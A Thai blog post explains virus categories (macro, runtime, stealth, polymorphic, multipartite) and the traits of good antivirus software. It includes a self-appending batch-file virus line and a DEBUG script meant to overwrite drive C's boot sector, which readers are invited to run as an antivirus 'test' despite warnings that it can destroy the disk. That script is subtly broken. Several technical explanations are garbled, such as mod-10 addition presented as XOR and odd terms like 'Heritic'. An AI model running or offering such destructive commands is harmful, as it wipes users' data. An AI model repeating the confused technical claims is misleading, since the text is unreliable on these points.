เพื่อปิดกั้นช่องทางของไวรัสและแฮกเกอร์มือใหม่



4. มาโครไวรัส (Macro Viruses)

ใน ปัจจุบันนี้ ผู้ที่อยู่สำนักงานหรือองค์กรต่างๆ ที่ต้องอาศัย MS-Office เป็นโปรแกรมสร้างงานเอกสารและนำเสนอก็นับว่าโชคดีครับ หลังจากวินโดวส์ XP ทำการติดตั้ง File Wall เพิ่มเข้ามา ไวรัสจำพวกนี้เริ่มสูญหายไปกับการถูกปฏิเสธการใช้คำสั่ง การที่คุณจะป้องกันไวรัสจำพวกนี้คือต้องติดตั้งโปรแกรมฆ่าไวรัสรุ่นใหม่ เพื่อป้องกันคำสั่ง "มาโคร" ซึ่งเป็นภาษา "VBA ; Visual Basic Application" ของตัวโปรแกรม ซึ่งเดิมทีผู้จัดทำโปรแกรมหวังให้ภาษานี้ช่วยสนับสนุนการทำงานที่ยากๆ ของเอกสารสำนักงานให้ง่ายลงมาและมีประสิทธิภาพเท่าเทียมกับโปรแกรม แต่เพราะความสามารถของภาษา "มาโคร" นี้เองที่ผู้สร้างไวรัสหันไปศึกษาและหาช่องทางในการเล่นงานคนอื่นผ่านเอกสาร เพียงฉบับเดียว สามารถแตกกระจายไปทั่วโลกได้อย่างน่ากลัว หนึ่งในไวรัสมาโครที่ประสบความสำเร็จด้านเลวร้ายคือ "เมลิซ่า Melisa" ในประเทศอเมริกา ซึ่งภายในชั่วข้ามคืน ไวรัสของเขาทำให้เครื่องนับ แสนเครื่องติดเชื้อและติดเชื้อแบบข้ามทวีปเลยทีเดียว ผมจึงอยากให้ทำความเข้าใจการทำงานของไวรัสจำพวกนี้ให้ดีและจะแนะนำว่า คุณมีโอกาศเพียงครั้งเดียวเท่านั้นในการคลิ๊ก ถ้าคุณเลือกตอบว่า "ใช้แมโคร" ก็เป็นอันว่า "ไวรัสจะซ่อนหน้าต่างนี้ไปจนกว่ามันจะตาย และเครื่องของคุณก็กลายเป็นทาสของมันทันที" เมื่อไวรัสสิงสถิตอยู่ในเครื่องของคุณแล้วคุณก็ไม่สามารถจะหยุดการทำงานของ มันได้โดยง่าย เช่น ถ้าคุณคิดจะไปกำจัดพวกมันใน Visual Basic Editor คุณไม่สามารถกำจัดมันด้วยวิธีธรรมดาแน่นอน เพราะไวรัสพวกนี้แม้ว่าคุณจะลบแฟ้มที่ติดไวรัสไปแล้วแต่มันยังฝังอยู่ในระบบ ของคุณอยู่ วิธีที่จะกำจัดหลายๆ คน ลงโปรแกรมใหม่ และลบแฟ้มติดไวรัสทิ้งให้หมด...นั่นก็เป็นทางแก้ปัญหาอีกทางหนึ่ง แต่คุณคงต้องทำอย่างนั้นบ่อยๆ ถ้ารับเอกสารจากลูกค้าหรือเพื่อนในสำนักงานที่ติดไวรัสอยู่ วงจรนี้ก็จะกลับมาอีก



ไวรัสคอมพิวเตอร์ตามลักษณะการทำงาน

1. รันไทม์ (Runtime Viruses)

ไวรัส ทำงานแบบรันไทม์ มันคือไวรัสชนิดแรกๆ ที่ผู้ที่เริ่มเขียนไวรัสสร้างขึ้น ซึ่งต้องทำความเข้าใจมันเสียก่อนเพื่อพัฒนาให้มันทำงานยากๆ ขึ้นไป ตัวอย่างคือ ข้อความต่อไปนี้ COPY *.BAT+%0.BAT *.BAT ไวรัสตัวอย่าง...มันจะทำงานแบบเรียบง่ายคือ...ถ้าเรียกทำงานจึงแสดงผล...ไม่ เรียกก็ไม่ทำงาน...และทำไมผู้เขียนไวรัสถึงเขียนไวรัสซื่อบื้อพวกนี้ขึ้นมา

- มันเขียนง่ายเข้าใจง่าย

- จะตรวจจับหรือพบไวรัสเมื่อมันทำการติดเชื้อไวรัสแล้ว

ไวรัส แบบรันไทม์นี้ ในอดีตนั้นนิยมใช้คำสั่ง Find First และ Find Next หรือ บริการ 4EH และ 4FH ของดอสอินเตอร์รัพต์ เพื่อทำการค้นแฟ้มที่สามารถติดเชื้อไวรัสได้คล้ายๆ DIR /S เพื่อหาแฟ้ม .COM หรือ .EXE ทั้งระบบ ถ้ามันพบแฟ้มดังกล่าวจะเขียนคำสั่งไวรัสลงไป จากนั้นจะหยุดการทำงานทั้งหมด เพื่อมิให้เครื่องทำงานช้าผิดสังเกต และรอแค่ว่าจะมีการเรียกใช้แฟ้มคำสั่งไวรัสนี้อีกครั้ง ก็จะทำงานเช่นเดิม ในปัจจุบัน โค้ดไวรัสจำพวกนี้ถูกตรวจสอบด้าน "เฮอร์ริติก ; Heritic" คือการสังเกตพฤติกรรม หรือ วิธีตรวจสอบ "เช็คซัม; Check sum" โดยส่วนใหญ่แล้วไวรัสจำพวกนี้จะถูกตรวจจับได้ ถ้าไวรัสนี้ยังไม่พัฒนาเป็นโพลีมอฟิกไวรัสก็จะถูกทำลายจนหมด

2. สเติลช์ (Stealth Viruses)

ไวรัส ชนิดนี้เราจะเรียกมันว่า "ไวรัสหลอกล่อดีบัก หรือ ไวรัสฝั่งตัว (TSR; Termenate Stay Resident)" ซึ่งจะเป็นไวรัสชั้นสูงเป็นส่วนใหญ่ ซึ่งการทำงานของไวรัสพวกนี้ ต้องอาศัยการ "รันไทม์" ในระบบปฏิบัติการเสียก่อน เช่นฝั่งตัวคำสั่งไวรัสใน COMMAND.COM เพื่อให้คำสั่งไวรัสฝั่งอยู่ในระบบเพื่อรอดักจับแฟ้ม .COM หรือ .EXE แฟ้มอื่น จากนั้นจะฝั่งคำสั่งล่องหนในหน่วยความ เพื่อไม่ให้โปรแกรมฆ่าไวรัสหรือผู้ใช้ระบบมองเห็นพวกมัน เช่น

- ถ้าระบบมีการตรวจสอบว่าแฟ้ม COMMAND.COM มีขนาดเป็นเท่าไร ไวรัสจะทำการหลอกระบบด้วยการแจ้งข้อมูลที่เป็น "เท็จ" เพื่อไม่ให้ระบบผิดสังเกตว่า COMMAND.COM มีขนาดเพิ่มขึ้น

- ถ้าระบบตรวจสอบแฟ้ม COMMAND.BAK ซึ่งเป็นแฟ้มที่ระบบสำรองเอาไว้ เพื่อดูว่า COMMAND.COM ตัวเดิมมีขนาดเท่าไร ไวรัสก็จะตรวจสอบว่าแฟ้ม COMMAND.BAK นั้นติดเชื้อไวรัสหรือยัง ถ้ายังไม่ติดเชื้อก็จะแทรกคำสั่งไวรัสลงไปทันที และก็ทำการแจ้งขนาดที่เป็น "เท็จ" เช่นเดิมเพื่อไม่ให้ระบบตรวจสอบได้

- ถ้าโปรแกรมฆ่าไวรัสทำการค้นไวรัสโดยดูว่าแฟ้มคำสั่งมีขนาดที่เปลี่ยนไปหรือ ไม่ หรือทำการสแกนค้นหาข้อความที่น่าจะเป็นไวรัส ไวรัสจะทำการย้ายหัวอ่านในตำแหน่งที่เป็นข้อมูลไวรัสไปยังตำแหน่งอื่น จากนั้นก็ย้ายหัวอ่านกลับมาที่แฟ้มเดิมในตำแหน่งที่ไม่ติดไวรัส ทำให้โปรแกรมฆ่าไวรัสหาไวรัสไม่เจอ แต่ไวรัสคอมพิวเตอร์ส่วนใหญ่ไม่ฉลาดนัก เพราะ แฟ้มคำสั่งสแกนไวรัสสมมุติเป็น NOD55.EXE ไวรัสจะตรวจสอบว่าโปรแกรมฆ่าไวรัสติดไวรัสหรือยัง ถ้ายังก็จะแพร่คำสั่งไวรัสลงไปในโปรแกรมสแกนไวรัสทันที ( โปรแกรมฆ่าไวรัสจึงกลายเป็นตัวแพร่เชื่อไวรัสทันทีถ้าไม่มีการอัปเดรตไวรัส) แต่ถ้าโปรแกรมฆ่าไวรัสที่ติดเชื้อไวรัสอยู่มีการ "อัปโหลด" กลับไปยังศูนย์วิจัยจะถูกตรวจสอบขนาดแบบ (Check Sum) เป็นผลให้พบไวรัสทันที เพราะว่าคำสั่งไวรัสไม่สามารถหลอกล่อดีบักเกอร์ในเครื่องที่ยังไม่ติดเชื้อ ไวรัสนั้นเอง เห็นไหม? ผู้ร้ายต้องตายตอนจบอยู่แล้วโดยสรุปคือ...ไวรัสจำพวก "เครื่องบินรบ" หรือ "สเติลช์" นั้นเป็นไวรัสที่ความสามารถสูงอย่างมากและต้องใช้ความสามารถในการสร้างมัน พอสมควร อย่างที่กล่าวไว้แล้ว ไวรัสจำพวกนี้ถูกสร้างจาก "ภาษาระดับต่ำ" แต่เป็น "ไวรัสชั้นสูง" เพราะรูปแบบคำสั่งอันซับซ้อนของภาษา "แอสเซมบลี (Assembly)" ซึ่งน้อยคนในสมัยนี้จะรู้จักและเขียนภาษาระดับต่ำเหล่านี้ได้ ก็นับว่าดีอยู่บ้าง เพราะว่าไวรัสจำพวกนี้ในปัจจุบันหายากมากๆ เพราะระบบปฏิบัติการวินโดวส์นั้นทำงานแบบ "มัลติโปรแกรมมิ่ง ; Multiprograming" การจองหน่วยความจำเพื่อฝั่งคำสั่งหลอกล่อนั้นไม่สามารถทำได้ง่ายๆ และก็โชคดีที่การจองการทำงานในหน่วยความจำของวินโดวส์ต้องอาศัย "Task Process" เท่านั้น เราจึงสามารถตรวจสอบได้ว่ามีอะไรแปลกปลอมในหน่วยความจำในเครื่องของเราเอง

3. โพลีมอฟิก (Polymorphic Viruses)

ไวรัส จำพวกนี้ มันเหมือนกับ "โจรพันหน้า" เพราะหลักการของมันคือการทำให้โค้ดของไวรัสเปลี่ยนไปทุกๆ ครั้งที่มีการติดเชื้อ แต่การเปลี่ยนโค้ดของไวรัสนั้นจะต้องรักษาคุณสมบัติของไวรัสแม่แบบอย่างคบ ถ้วนเพื่อไม่ให้ไวรัสเกิดการทำงานที่ผิดพลาด

3.1. ต้นแบบไวรัสคือ 012345678X ซึ่งตัวเลขชุดนี้สมมุติให้เป็นคำสั่งไวรัสทั้งชุดคำสั่ง ตัวเลขในนั้นห้ามผิดเพี้ยนไปแม้แต่ตัวเดียวถ้าผิดจะทำให้ไวรัสทำงานผิดพลาด สุ่ม X = 6 จะกลายพันธ์เป็น (0+6)(1+6)(2+6)(3+6)(4+6)(5+6)(6+6)(7+6)(8+6)(X=6) = 6789012346 (ทำไม 4+6เป็น 10 และทำไมในตัวอย่างเป็น 0 เพราะ คอมพิวเตอร์จะตัดเลขตัวแรกออกให้ได้ค่าของ XOR ทางคณิตศาสตร์)

3.2. เมื่อไวรัสติดเชื้อแฟ้มเป้าหมายจะทำการถอดรหัสของตัวเองจาก 6789012346 X = 6 (X คือค่าที่ถูกสุ่มขึ้นมาเก็บเอาไว้ในตัวสุดท้าย)" กลายเป็น (6-6)(7-6)(8-6)(9-6)(0-6)(1-6)(2-6)(3-6)(4-6)(X-6) เป็น 0123456789X อีกครั้งเพื่อเรียกคำสั่งไวรัสทำงาน...จากนั้นจะทำการสุ่ม X ขึ้นมาใหม่และกลายพันธ์เป็นเลขตัวอื่นต่อไป...ดังนี้

3.3. เมื่อไวรัสในข้อ 2 ต้องการแพร่เชื้อไปยังแฟ้มเป้าหมายอีกครั้ง X = 3 (สุ่มมาใหม่) จะกลายพันธ์เป็น (0+3)(1+3)(2+3)(3+3)(4+3)(5+3)(6+3)(7+3)(8+3)(X=3) = 3456789013 ซึ่ง 34567893 จะไม่มีความเหมือน 6789012346 แม้แต่นิดเดียว....ทำให้โปรแกรมฆ่าไวรัส...สแกนข้อความที่ซ้ำกันไม่เจอ ...(ยกเว้น...จะหาโค้ดสำคัญที่ใช้ในการเข้ารหัสในนั้นได้...หรือที่เรียกว่า "อัลกอลิทึม" เจอ...จึงสแกนฆ่ามันได้ทุกตัว) ไม่จำเป็นเสมอไปครับที่อัลกอลิทึมของคณิตศาสตร์หรือสมการเข้ารหัสจะต้องเป็น ตัวเดียวกันหรือ ใช้คำสั่ง "อเล็กซันเดอร์มหาราช" ตามตัวอย่างที่กล่าวมา แต่การคำนวนเข้ารหัสในคอมพิวเตอร์ ภาษาใดๆ ก็ตาม นิยมใช้คำสั่ง (Excucive OR; XOR) เพื่อทำการเข้ารหัส ซึ่งรูปแบบของคำสั่งคล้ายๆ การคำนวณที่ผ่านมาเพียงแต่อยู่บนพื้นฐานของตรรกะวิทยาซึ่งไม่มีนิยามที่ ยุ่งยาก

0 XOR 0 = 0 0 XOR 1 = 1 1 XOR 0 = 1 1 XOR 1 = 0

ตรรกะนิยามคือ "เลขต่างกันให้เป็น 1"

VIRUS XOR RANDOM = KEY และย้อนกับเป็น KEY XOR RANDOM = VIRUS

สมมุติไวรัสมี 1 บิต

1 XOR 1 = 0 และย้อนกับเป็น 0 XOR 1 = 1

สมมุติไวรัสมี 4 บิต

1011 XOR 1110 = 0101 และย้อนกับเป็น 0101 XOR 1110 = 1011



4. มัลติเพลต (Multipartite Viruses)

" ไวรัสกลายพันธ์" หรือ "หลากหลายสายพันธ์" มัลติเพลตไวรัสเป็นไวรัสจำพวกหนึ่งที่มีความสามารถทางภาษา คือ ในไวรัสตัวเดียวนั้นอาจประกอบไปด้วยภาษาคอมพิวเตอร์มากกว่า หนึ่งภาษา เพื่อให้ไวรัสสามารถกระจายเชื้อไปได้อย่างกว้างขวาง ซึ่งในภาษาคอมพิวเตอร์ภาษาใดก็ตามที่เขียนอยู่ในไวรัส สามารถแพร่กระจายตัวเองไปยัง "แพลตฟอร์ม ; Partform" เดียวกันได้และยังมีความสามารถแพร่เชื้อไปยังแพลตฟอร์มอื่นๆ ได้ด้วย บางตัวสามารถกระจายไปยัง Binary Code หรือภาษาระดับต่ำเพื่อติดเชื้อแฟ้มระบบ .EXE หรือ .COM ได้ โดยตัวไวรัสจะบรรจุคำสั่ง Binary Code เก็บเอาไว้ในตัวของมันซึ่งบางครั้งเป็น "เทกซ์ ; Text" หรือ "ข้อความ" ทั่วไป ผ่านการประมวลผลและคัดลอกทั้งชุดคำสั่งไวรัสไปเก็บเอาไว้ในเป้าหมายทุกๆ คำสั่ง แม้ว่าจะไม่ใช่ภาษาที่ฟอร์มนั้นก็ตาม ดูตามรูป

ภาษาคอมพิวเตอร์ จะแยกแพลตฟอร์มออกเป็น 3 ระดับด้วยกัน คือ

1. คำสั่งภาษาเครื่อง หรือ Binary Code ซึ่งจะพบในไวรัสบูตเซกเตอร์

2. คำสั่งภาษา Asembly Code คือภาษา ที่ใช้ควบคุมระบบปฏิบัติการ (ถึงแม้จะเก็บเป็น Binary Code แต่มีรูปแบบของชุดคำสั่งที่แน่นอน)

3. ภาษาสคริป จะเป็นเพียงข้อความที่จะประมวลผลผ่าน Programs อีกที

ไอคอน ตัวอย่างแสดงให้เห็นถึง "แพลตฟอร์ม" ต่างๆ ในที่นี้แค่ยกตัวอย่าง ซึ่งฟอร์มต่างๆ มากมายในระบบปฏิบัติการนั้นสามารถถูกไวรัสจำพวกนี้เชื่อมต่อคำสั่งได้หมดไม่ เว้นแม่แต่ "บูตเซกเตอร์" ในระดับล่างสุด ถ้าเวิร์มเมอร์ที่มีประสบการณ์อย่างสูง...จะสามารถเขียนไวรัสเชื่อมต่อ "แพลตฟอร์มระดับต่ำ" กับ "แพลตฟอร์มระดับสูงได้"





การป้องกันไวรัสที่และคุณสมบัติของโปรแกรมฆ่าไวรัสที่ดี....

คือ อย่างนี้ครับ...ในโลกเราทุกวันนี้...คนเขียนกับคนฆ่าไวรัส...นั้นปริมาณของ คน 2 กลุ่มนี้...ดูแตกต่างกันมากมาย...คุณอ่านมาอาจจะเห็นว่ามีนักเขียนไวรัสแค่ คนเดียว...กับนักฆ่าไวรัสอาจทำให้ CERT ของไทยเราร่วม 100 คน ทำงานทั้งคืน...เพราะไวรัสอีกนับร้อยที่กะจายตัวอยู่ขณะนี้ซึ่งไวรัสเด็กๆ ชิว...ก็เห็นตอบกระทู้กันเกลื่อน...แต่ถ้าเป็นไวรัสแบบพี่บิ๊กคงต้องให้ออก ข่าว...และทาง MicroSoft ออก "แพทช์" เสริมกันยกใหญ่เอาล่ะ...อย่าว่าเป็นคดีวัวหายล้อมคอกกันเลย...เพราะนักเขียน ไวรัสบางคนใช้เทคนิคที่พึ่งปรึกษากันกับนักเขียนไวรัสด้วยกัน...เล่นงานเรา ได้...ก็ต้องอาศัยการศึกษามานับเดือนเหมือนกัน...จึงเริ่มออกสตาร์ทก่อนเสมอ ในการวิ่ง 100 เมตร...

1. โปรแกรมฆ่าไวรัสที่ดีจะ...ป้องกัน ระบบ Kernal ของระบบปฏิบัติการได้

ทดสอบการโจมตีด้วยคำสั่งนี้

**** อันตรายอย่างมาก...ระบบอาจพินาศแค่คลิ๊กเดียวของคุณ...ก่อนอื่นให้คุณเข้า สู่ CMOS ตรวจสอบให้ดีว่า Virus Protection Option ถูกติดตั้งหรือยัง...เพราะช่างซ่อมคอมพิวเตอร์บางคนเพิกเฉยต่อคำสั่งนี้... ก็เป็นอันว่า...คำสั่งนี้จะทำให้ฮาร์ดดิสก์คุณพินาศ...

:: แบทไฟล์ทดสอบความสามารถของโปรแกรมฆ่าไวรัส

:: ด้วยการ Clean Boot Sector ไดร์ฟ C:

@echo W 0 3 0 1 > Nuke.SCR

@echo Q>Nuke.SCR

@DEBUG < NUKE.SCR

เมื่อ คุณปิดการทำงานของ Virus Protection ใน CMOS ก็อาจจะเจอคำสั่งทำลายล้างมหาวินาศ นี้ซะ...อย่างที่ไม่รู้เลยว่าเครื่องคุณโดนอะไร...จึงฝากเตือนช่างซ่อม ทั้งหลายด้วยครับว่าเปิดมันซะ...ถ้าคุณใช้วินโดวส์ โดยไม่มีลีนุกซ์ย่ำนะครับ...คำสั่งมีไว้ศึกษาทดลอง...แต่ไม่ใช่ให้ไปแกล้งคน อื่นกัน

2. โปรแกรมฆ่าไวรัสที่ดีจะ...ป้องกันการ "ฮุกอินเตอร์รัพต์ ของ TSR ไวรัส" ได้



************** จะมาเพิ่มคำสั่ง Hook Interupt ไวรัสเพื่อตรวจสอบ



3. โปรแกรมฆ่าไวรัสที่ดีจะ...ป้องกันการเข้าแทรกแซง "Rootkit" จาก System Virus ได้



************** ติดตามในไวรัสคอมพิวเตอร์ใกล้ตัวกว่าที่คุณ ภาค 3


4. โปรแกรมฆ่าไวรัสที่ดีจะ...ป้องกันการหยุดการทำงานหรือลบโปรแกรมฆ่าไวรัสทิ้ง จาก "รีโทรลไวรัส"



************** จะมาเพิ่มคำสั่งหยุดโปรแกรมฆ่าไวรัสภายหลัง



แล้วเราจะปลอดภัยจากไวรัสได้อย่างไร...

- สิ่งที่ป้องกันเครื่องของคุณจากไวรัส...(ไม่มีครับ...เพราะไวรัสไม่ได้มาใน รูปแบบของ อุปกรณ์แฟลชไดร์ฟอย่างเดียว) ทางที่เราจะสามารถป้องกันมันได้...ก็คือภมิคุ้มกันทางมันสมองและสองมือของ คุณเท่านั้น...ผมจะอธิบายให้กระจ่างว่าไวรัสมาได้กี่ช่องทาง

- ไวรัสสามารถมาได้แม้ว่าคุณติดโปรแกรมฆ่าไวรัส...เพราะมันถูกเขียนขึ้นมาใหม่ ...ภายในไม่กี่ชั่วโมงก่อนที่คุณจะเห็นข่าวในทีวี...จากนั้นมันจะกระจายตัว ในเครื่องคุณและเครื่อข่าย...ก่อนที่โปรแกรมฆ่าไวรัสจะหาทางกำจัดมันได้... และกว่าคุณจะรู้ว่าติดไวรัสสายพันธ์ใหม่ซะแล้ว...ก็ต่อเมื่อ...เรื่องนี้... เป็นเรื่องเล่าขานผ่านทางโทรศัพท์และกระทู้ที่โพสต์ในวันรุ่งขึ้น ไวรัสรุ่นเก่า...ก็สามารถแพร่เชื้อผ่านเครื่องที่คุณคิดว่าไม่ต้องติดตั้ง โปรแกรมฆ่าไวรัสเพราะทำให้เครื่องช้า...เป็นเหตุผลให้ ... "เด็กยุคใหม่ที่ไม่มีวัคซีนป้องกันฝีดาษ พากันล่มตายเพราะ...คิดว่าไวรัสยุคเก่าจะไม่กลับมา"

- ช่องทางทำลายล้างผ่าน VBScript ของ Internet Exproler ช่องทางนี้...นับว่าน่ากลัวมากครับ...สำหรับผู้ที่ใช้งาน IE อยู่ ถ้าเป็น"ไฟฟอกซ์" นั้น สคริป VBS จะไม่ถูกเรียกใช้งานแต่ ใช่ว่าจะไม่มีไวรัสแต่บนบราว์เซอร์ตัวอื่น ที่บล็อกการทำงานของ VBS นั้นก็ยังปลอดภัยกว่าที่จะให้สคริป VBS ส่งผลต่อเครื่องของพวกคุณ อย่างที่เคยผ่านมาใน I Love You หรือ "ไวรัสเลิฟบัก" จงจำไว้อย่างเดียวเลยครับว่า...ไม่มีเวปหรือ Blog ที่ปลอดภัยอยู่ในโลกครับ...ตัวอย่างที่ดีคือ blog ของผม...ถ้าคุณใช่ IE อยู่ ดูได้จาก View...Source...ซึ่งคำสั่งของเอกสาร HTML แสดงถ้าคุณไม่เคยเรียนคำสั่งพวกนี้ต่อให้มันมีไวรัสหรือ แอดแวร์ ฝั่งอยู่ คุณก็ไม่มีทางกำจัดมันได้หรือรู้ได้ว่ามันทำอะไรกับเครื่องของพวกคุณ ซึ่งความปลอดภัยของเวบบล็อกนี้...จะถูกดูแลโดย Server ของแต่ละเวปบล็อก ครับ...โดยพวกเค้าจะมี เอกสารควบคู่หรือ อาเรย์เวป และสถาปัตยกรรม

" พล็อกซี่" ซึ่งจะทำการตรวจและดูแลกันแหละกันอย่าง "ฝาแฝด"ถ้า "คนใดติดโรค" กล่าวคือ "ถ้าโคลนนิ่งมีความแตกต่างกันแสดงว่ามีความผิดปกติด้านพันธุกรรมทันทีจะถูก ตรวจสอบด้วย ค่าความถูกต้องที่เก็บเอาไวรัสใน เครื่อง (พล็อกซี่) ทั้งสองมาเปรียบเทียบกันเพื่อหาค่าแตกต่างซึ่งนั้นก็คือไวรัส ... และจะถูกกำจัดทันที" เฮอ...หมดห่วงเรื่องนี้ได้...ยกเว้น...วันใด...มีไวรัสหลุดสถาปัตกรรมรูปแบบ นี้มา...ก็เป็นข่าวใหญ่กัน

โพสต์ยอดนิยมจากบล็อกนี้

I miss you all กับ I miss all of you ต่างกันอย่างไร

ปัญหาและเฉลยวิชาธรรม นักธรรมชั้นตรี สอบในสนามหลวง วันอังคาร ที่ ๒๙ กันยายน พ.ศ.๒๕๕๒

ปัญหาและเฉลยวิชาอนุพุทธประวัติ นักธรรมชั้นโท สอบในสนามหลวง วันอาทิตย์ ที่ ๒๐ พฤศจิกายน พ.ศ. ๒๕๔๘